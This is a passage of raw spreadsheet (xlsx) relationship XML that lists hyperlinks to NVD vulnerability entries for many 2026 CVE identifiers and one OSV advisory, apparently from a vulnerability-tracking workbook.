Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82760" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85077" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86039" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92903" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26950" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54446" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54520" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54596" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76834" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81442" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81475" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81476" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81478" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87935" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92984" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78428" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25282" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59607" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24073" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24074" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24075" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25278" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25280" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25290" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54692" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81474" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86320" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92838" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93337" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48977" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50158" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53557" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54339" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81546" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45726" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54506" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66618" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66619" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66624" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66625" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66626" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66628" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66630" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66631" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78425" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80218" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82685" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25275" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50125" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50275" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50277" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50285" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53534" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54716" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63460" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68523" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68537" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81481" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81515" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81516" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85128" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85715" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85719" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85721" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85917" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86038" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86040" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87742" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92916" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92917" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92942" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92961" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92983" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93435" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93436" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24081" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25281" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25294" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50605" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50609" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50610" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78501" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81446" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86688" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90997" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92913" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25284" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53554" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54634" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66269" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76154" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80356" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81440" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52727" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54646" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54647" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81445" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81477" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81480" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81632" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92919" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92980" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15697" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44236" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52851" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54510" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54524" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54608" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66571" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86049" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86862" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90887" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90986" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91014" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92925" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92959" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93014" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45720" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93015" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77411" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77405" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77408" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77403" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77410" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77412" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75516" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77404" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82410" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77406" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59965" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77407" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63126" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63506" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76825" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81875" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81876" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85731" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85756" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId264" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92939" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93393" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54597" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54354" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87935" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53557" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45726" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50125" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93435" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90997" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52727" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92925" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45720" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92756" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92757" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53556" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92758" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45723" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90332" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93063" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93068" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93202" 